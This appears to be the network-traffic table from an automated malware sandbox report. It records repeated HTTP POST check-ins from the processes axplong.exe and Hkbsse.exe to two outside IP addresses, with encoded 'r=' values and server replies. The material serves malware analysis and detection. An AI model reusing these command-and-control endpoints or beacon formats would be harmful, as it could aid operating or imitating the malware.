Jun 24, 2024 00:10:35.419733047 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:35.615992069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49775	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:34.785367966 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:35.467262983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:35.467911959 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:35.680892944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49780	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:35.781924009 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:36.418929100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:36.419579029 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:36.613689899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49781	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:35.834908962 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:36.512728930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:36.513654947 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:36.729823112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49785	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:36.728527069 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:38.376946926 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.379278898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.379368067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.379462004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.381022930 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:38.577682018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49786	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:36.839523077 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:38.379260063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.379348040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.379404068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.379503012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:38.380845070 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:38.597405910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49788	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:38.692128897 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:39.341837883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:39.342515945 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:39.537878036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49789	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:38.706156969 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:39.420401096 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:39.421034098 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:39.649250031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49792	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:39.651240110 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:40.302690029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:40.303930998 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:40.502326012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49794	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:39.760476112 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:40.457226038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:40.475752115 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:40.693377018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49797	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:40.617814064 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:41.253968954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:41.254581928 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:41.444605112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49799	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:40.805054903 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:41.502782106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:41.503815889 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:41.721041918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49800	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
